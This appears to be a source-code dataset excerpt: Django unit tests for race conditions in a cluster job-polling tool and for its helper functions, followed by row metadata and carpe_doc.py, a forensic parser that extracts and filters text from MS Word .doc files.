with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
delete_cluster_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
cluster_temp_dir.cleanup()
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_finished_job_deleted_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (finished) is deleted after status is determined")
logger.info("-"*80)
def delete_job_dir(*a, **kw):
"""
Delete job_dir
"""
logger.info("Job folder is deleted ***********")
# Remove cluster scratch dir
shutil.rmtree(job_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
delete_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_finished_job_permission_removed_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (finished) is read permission removed after status is determined")
logger.info("-"*80)
def remove_read_permission_job_dir(*a, **kw):
"""
Remove read permission from job_dir
"""
logger.info("Job folder read permission removed ***********")
os.chmod(job_dir, 0o222)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
remove_read_permission_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Giving back permission for removal
os.chmod(job_dir, 0o777)
# Assert only if not on CI
if not running_on_ci:
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_README_deleted_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with README deleted before info is retrieved")
logger.info("-"*80)
def delete_README(*a, **kw):
"""
Delete README from job_dir
"""
logger.info("REAMDE deleted ***********")
os.remove(readme_filepath)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
delete_README):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_README_deleted_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with README deleted before info is retrieved")
logger.info("-"*80)
def delete_README(*a, **kw):
"""
Delete README from job_dir
"""
logger.info("REAMDE deleted ***********")
os.remove(readme_filepath)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
delete_README):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_README_permission_removed_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with README read permission removed before info is retrieved")
logger.info("-"*80)
def remove_read_permission_README(*a, **kw):
"""
Remove read permission from job_dir
"""
logger.info("README read permission removed ***********")
os.chmod(readme_filepath, 0o222)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
remove_read_permission_README):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Giving back permission for removal
os.chmod(readme_filepath, 0o777)
# Assert only if not on CI
if not running_on_ci:
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -----------------------------------------------------------------------------
# Test Helper Function `is_recent`
# -----------------------------------------------------------------------------
class TestIsRecent(TestCase):
"""
Test the `is_recent` helper method of the `poll_jobs` script
"""
# -------------------------------------------------------------------------
def test_now(self):
datetime_obj = datetime.now()
self.assertTrue(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_24h_ago(self):
datetime_obj = datetime.now() - timedelta(hours=24)
# Testing true fails, because the now in the test is older than the now
# in the function.
# self.assertTrue(is_recent(datetime_obj))
# Therefore I need to tests false.
self.assertFalse(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_12h_ago(self):
datetime_obj = datetime.now() - timedelta(hours=12)
self.assertTrue(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_12h_in_future(self):
datetime_obj = datetime.now() + timedelta(hours=12)
self.assertTrue(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_365days_ago(self):
datetime_obj = datetime.now() - timedelta(days=365)
self.assertFalse(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_None(self):
datetime_obj = None
self.assertFalse(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_string(self):
datetime_obj = "this is a string"
self.assertFalse(is_recent(datetime_obj))
# -----------------------------------------------------------------------------
# Test Helper Function `required_keys_avaiable`
# -----------------------------------------------------------------------------
class TestRequiredKeysAvailable(TestCase):
"""
Test the `required_keys_avaiable` helper method of the `poll_jobs` script
"""
# -------------------------------------------------------------------------
def test_dict_with_all_required_keys(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["main_name"] = "something"
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertTrue(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_base_runs(self):
"""Test dictionary with all required key available"""
readme_dict = {}
# readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_username(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
# readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_email(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
# readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_info_block(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
# readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_sub_date(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
# readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_solver(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
# readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_main_name(self):
"""Test dictionary with all required key available"""
readme_dict = {}
# readme_dict["main_name"] = "something"
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
| 37.500701
| 116
| 0.58357
| 5,963
| 53,476
| 4.898038
| 0.056851
| 0.027391
| 0.032526
| 0.013353
| 0.900161
| 0.880508
| 0.866539
| 0.846441
| 0.833225
| 0.817612
| 0
| 0.010573
| 0.264268
| 53,476
| 1,425
| 117
| 37.527018
| 0.731776
| 0.172919
| 0
| 0.785486
| 0
| 0
| 0.13536
| 0.032141
| 0
| 0
| 0
| 0
| 0.089648
| 1
| 0.049093
| false
| 0
| 0.01921
| 0
| 0.074707
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f431ffba409cd91ada745cc0adc96fabded45567
| 101,119
|
py
|
Python
|
modules/DEFA/MS_Office/carpe_doc.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 56
|
2019-02-07T06:21:45.000Z
|
2022-03-21T08:19:24.000Z
|
modules/DEFA/MS_Office/carpe_doc.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 5
|
2020-05-25T17:29:00.000Z
|
2021-12-13T20:49:08.000Z
|
modules/DEFA/MS_Office/carpe_doc.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 31
|
2019-03-13T10:23:49.000Z
|
2021-11-04T12:14:58.000Z
|
# carpe_doc.py
import os
import struct
import sys
import zlib
import compoundfiles
import olefile
class DOC:
def __init__(self, compound):
self.compound = compound
def __enter__(self):
raise NotImplementedError
def __exit__(self):
raise NotImplementedError
def parse_doc(self):
if self.compound.is_damaged == self.compound.CONST_DOCUMENT_NORMAL:
self.__parse_doc_normal__()
elif self.compound.is_damaged == self.compound.CONST_DOCUMENT_DAMAGED:
self.__parse_doc_damaged__()
def __doc_extra_filter__(self, string, uFilteredTextLen):
i = 0
j = 0
k = 0
textLen = uFilteredTextLen
# 1. 첫 부분의 공백 문자 모두 제거
# 2. 공백 문자가 2 개 이상인 경우에 1 개로 만들자
# 3. 개행 문자가 2 개 이상인 경우에 1 개로 만들자
# 4. Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
uCaption = b'\x53\x00\x45\x00\x51\x00'
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00'
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00'
uToc = b'\x54\x00\x4F\x00'
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00'
uEnd = b'\x20\x00\x01\x00\x14\x00'
uEnd2 = b'\x20\x00\x14\x00'
uEnd3 = b'\x20\x00\x15\x00'
uEnd4 = b'\x14\x00'
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00'
uHeader = b'\x13\x00'
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00'
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00'
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00'
uDoc = b'\x44\x00\x4F\x00\x43\x00'
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00'
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00'
filteredText = string
while i < textLen :
if i == 0:
k = 0
while (filteredText[0:2] == uBlank or filteredText[0:2] == uBlank2 or filteredText
[0:2] == uNewline or filteredText
[0:2] == uNewline2 or
filteredText[0:2] == uNewline3 or filteredText[0:2] == uNewline4) :
filteredText = filteredText[:k] + filteredText[k + 2:]
textLen -= 2
if (len(filteredText) == 0):
break
if len(filteredText) == 0:
break
if (len(filteredText) >= 2 + i) and filteredText[i : i + 2] == uHeader:
filteredText = filteredText[:i] + filteredText[i + 2:]
textLen -= 2
if (len(filteredText) >= 2 + i) and filteredText[i : i + 2] == uBlank:
filteredText = filteredText[:i] + filteredText[i + 2:]
textLen -= 2
charSize = 0
temp = True
j = i
if (len(filteredText) >= 16 + i) and \
(filteredText[i: i + 6] == uCaption or filteredText[i: i + 18] == uHyperlink or
filteredText[i: i + 4] == uToc or filteredText[i: i + 14] == uPageref or filteredText[
i: i + 10] == uIndex or
filteredText[i: i + 10] == uChart or filteredText[i: i + 10] == uShape or filteredText[
i: i + 8] == uPage or
filteredText[i: i + 6] == uDoc or filteredText[i: i + 16] == uStyleref or filteredText[
i: i + 10] == uTitle or filteredText[
i: i + 14] == uDate):
pass
else:
temp = False
while temp == True:
if (len(filteredText) >= 6 + j) and (filteredText[j: j + 6] == uEnd):
charSize += 6
j += 6
break
elif (len(filteredText) >= 4 + j) and (
filteredText[j: j + 4] == uEnd2 or filteredText[j: j + 4] == uEnd3):
charSize += 4
j += 4
break
elif (len(filteredText) >= 2 + j) and (filteredText[j: j + 2] == uEnd4):
charSize += 2
j += 2
break
charSize += 2
j += 2
if (len(filteredText) < 6 + j):
temp = False
break
if temp == True:
filteredText = filteredText[:i] + filteredText[i + charSize:]
textLen -= charSize
i -= 2
continue
if (len(filteredText) >= 2 + i) and (
filteredText[i: i + 2] == uSection or filteredText[i: i + 2] == uSection6 or
filteredText[i: i + 2] == uSection9):
filteredText = filteredText[:i] + filteredText[i + 2:]
textLen -= 2
i -= 2
continue
if (len(filteredText) >= 4 + i) and (filteredText[i: i + 4] == uHeader):
filteredText = filteredText[:i] + filteredText[i + 4:]
textLen -= 4
i -= 4
continue
i += 2
dict = {}
dict['string'] = filteredText
dict['length'] = textLen
return dict
def __parse_doc_normal__(self):
word_document = bytearray(self.compound.fp.open('WordDocument').read()) # byteWD
one_table = b''
zero_table = b''
try:
one_table = bytearray(self.compound.fp.open('1Table').read())
except compoundfiles.errors.CompoundFileNotFoundError:
pass
#print("1Table is not exist.")
try:
zero_table = bytearray(self.compound.fp.open('0Table').read())
except compoundfiles.errors.CompoundFileNotFoundError:
pass
#print("0Table is not exist.")
if len(one_table) == 0 and len(zero_table) == 0:
return self.compound.CONST_ERROR
# Extract doc Text
ccpText = b''
fcClx = b''
lcbClx = b''
aCP = b''
aPcd = b''
fcCompressed = b''
Clx = b''
byteTable = b''
ccpTextSize = 0
fcClxSize = 0
lcbClxSize = 0
ClxSize = 0
string = b''
CONST_FCFLAG = 1073741824 # 0x40000000
CONST_FCINDEXFLAG = 1073741823 # 0x3FFFFFFF
i = 0
j = 0
k = 0
# Check Encrypted
uc_temp = word_document[11]
uc_temp = uc_temp & 1
if uc_temp == 1:
return self.compound.CONST_ERROR
# 0Table 1Table
is0Table = word_document[11] & 2
if is0Table == 0:
byteTable = zero_table
else:
byteTable = one_table
# Get cppText in FibRgLw
ccpText = word_document[0x4C:0x50]
ccpTextSize = struct.unpack('<I', ccpText)[0]
if (ccpTextSize == 0):
return self.compound.CONST_ERROR
# Get fcClx in FibRgFcLcbBlob
fcClx = word_document[0x1A2:0x1A6]
fcClxSize = struct.unpack('<I', fcClx)[0]
if (fcClxSize == 0):
return self.compound.CONST_ERROR
# Get lcbClx in FibRgFcLcbBlob
lcbClx = word_document[0x1A6:0x1AA]
lcbClxSize = struct.unpack('<I', lcbClx)[0]
if (lcbClxSize == 0):
return self.compound.CONST_ERROR
# Get Clx
Clx = byteTable[fcClxSize: fcClxSize + lcbClxSize]
if Clx[0] == 0x01:
cbGrpprl = struct.unpack("<H", Clx[1:3])[0]
Clx = byteTable[fcClxSize + cbGrpprl + 3: (fcClxSize + cbGrpprl + 3) + lcbClxSize - cbGrpprl + 3]
if Clx[0] != 0x02:
return self.compound.CONST_ERROR
ClxSize = struct.unpack('<I', Clx[1:5])[0]
ClxIndex = 5
PcdCount = 0
aCPSize = []
fcFlag = 0
fcIndex = 0
fcSize = 0
encodingFlag = False
PcdCount = int(((ClxSize / 4) / 3)) + 1
for i in range(0, PcdCount):
aCp = Clx[ClxIndex:ClxIndex + 4]
aCPSize.append(struct.unpack('<I', aCp[0:4])[0])
ClxIndex += 4
PcdCount -= 1
### Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
uCaption = b'\x53\x00\x45\x00\x51\x00'
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00'
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00'
uToc = b'\x54\x00\x4F\x00'
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00'
uEnd = b'\x20\x00\x01\x00\x14\x00'
uEnd2 = b'\x20\x00\x14\x00'
uEnd3 = b'\x20\x00\x15\x00'
uEnd4 = b'\x14\x00'
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00'
uHeader = b'\x13\x00'
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00'
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00'
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00'
uDoc = b'\x44\x00\x4F\x00\x43\x00'
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00'
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00'
### Filtering targets: 0x0001 ~ 0x0017(0x000A Line Feed skipped)
uTab = b'\x09\x00' # Horizontal Tab
uSpecial = b'\xF0'
bFullScanA = False
bFullScanU = False # if the size info is invalid, then the entire range will be scanned.
tempPlus = 0
for i in range(0, PcdCount):
aPcd = Clx[ClxIndex:ClxIndex + 8]
fcCompressed = aPcd[2:6]
fcFlag = struct.unpack('<I', fcCompressed[0:4])[0]
if CONST_FCFLAG == (fcFlag & CONST_FCFLAG):
encodingFlag = True # 8-bit ANSI
else:
encodingFlag = False # 16-bit Unicode
fcIndex = fcFlag & CONST_FCINDEXFLAG
k = 0
if encodingFlag == True: # 8-bit ANSI
fcIndex = int(fcIndex / 2)
fcSize = aCPSize[i + 1] - aCPSize[i]
if len(word_document) < fcIndex + fcSize + 1:
if bFullScanA == False and len(word_document) > fcIndex:
fcSize = len(word_document) - fcIndex - 1
bFullScanA = True
else:
ClxIndex += 8
continue
ASCIIText = word_document[fcIndex:fcIndex + fcSize]
UNICODEText = b''
for i in range(0, len(ASCIIText)):
UNICODEText += bytes([ASCIIText[i]])
UNICODEText += b'\x00'
while k < len(UNICODEText):
if (UNICODEText[k: k + 2] == uSection2 or UNICODEText[k: k + 2] == uSection3 or UNICODEText[
k: k + 2] == uSection4 or
UNICODEText[k: k + 2] == uSection5 or UNICODEText[k: k + 2] == uSection7 or UNICODEText[
k: k + 2] == uSection8 or
UNICODEText[k + 1] == uSpecial or UNICODEText[k: k + 2] == uTrash):
k += 2 ### while
continue
if (UNICODEText[k: k + 2] == uNewline or UNICODEText[k: k + 2] == uNewline2 or UNICODEText[
k: k + 2] == uNewline3 or UNICODEText[
k: k + 2] == uNewline4):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uNewline or
UNICODEText[j:j + 2] == uNewline2 or UNICODEText[j:j + 2] == uNewline3 or UNICODEText[
j:j + 2] == uNewline4 or
UNICODEText[j:j + 2] == uTab or UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= len(UNICODEText):
break
elif (UNICODEText[k:k + 2] == uBlank or UNICODEText[k:k + 2] == uBlank2 or UNICODEText[
k:k + 2] == uTab):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uTab or
UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if (j >= len(UNICODEText)):
break
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
k += 2
elif encodingFlag == False: ### 16-bit Unicode
fcSize = 2 * (aCPSize[i + 1] - aCPSize[i])
if (len(
word_document) < fcIndex + fcSize + 1): # Invalid structure - size info is invalid (large) => scan from fcIndex to last
if (bFullScanU == False and len(word_document) > fcIndex):
fcSize = len(word_document) - fcIndex - 1
bFullScanU = True
else:
ClxIndex = ClxIndex + 8
continue
while k < fcSize:
if (word_document[fcIndex + k: fcIndex + k + 2] == uSection2 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection3 or
word_document[fcIndex + k: fcIndex + k + 2] == uSection4 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection5 or
word_document[fcIndex + k: fcIndex + k + 2] == uSection7 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection8 or
word_document[fcIndex + k + 1] == uSpecial or word_document[
fcIndex + k: fcIndex + k + 2] == uTrash):
k += 2
continue
if (word_document[fcIndex + k: fcIndex + k + 2] == uNewline or word_document[
fcIndex + k: fcIndex + k + 2] == uNewline2 or
word_document[fcIndex + k: fcIndex + k + 2] == uNewline3 or word_document[
fcIndex + k: fcIndex + k + 2] == uNewline4):
if (word_document[fcIndex + k] == 0x0d):
string += b'\x0a'
string += bytes([word_document[fcIndex + k + 1]])
else:
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
j = k + 2
while j < fcSize:
if (word_document[fcIndex + j: fcIndex + j + 2] == uSection2 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection3 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection4 or
word_document[fcIndex + j: fcIndex + j + 2] == uSection5 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection7 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection8 or
word_document[fcIndex + j: fcIndex + j + 2] == uBlank or word_document[
fcIndex + j: fcIndex + j + 2] == uBlank2 or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline2 or
word_document[fcIndex + j: fcIndex + j + 2] == uNewline3 or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline4 or word_document[
fcIndex + j: fcIndex + j + 2] == uTab or
word_document[
fcIndex + j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= fcSize:
break
elif word_document[fcIndex + k: fcIndex + k + 2] == uBlank or word_document[
fcIndex + k: fcIndex + k + 2] == uBlank2 or word_document[
fcIndex + k: fcIndex + k + 2] == uTab:
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
j = k + 2
while j < fcSize:
if (word_document[fcIndex + j: fcIndex + j + 2] == uSection2 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection3 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection4 or
word_document[fcIndex + j: fcIndex + j + 2] == uSection5 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection7 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection8 or
word_document[fcIndex + j: fcIndex + j + 2] == uBlank or word_document[
fcIndex + j: fcIndex + j + 2] == uBlank2 or word_document[
fcIndex + j: fcIndex + j + 2] == uTab or
word_document[fcIndex + j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= fcSize:
break
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
k += 2
ClxIndex += 8
dictionary = self.__doc_extra_filter__(string, len(string))
filteredText = dictionary['string']
filteredLen = dictionary['length']
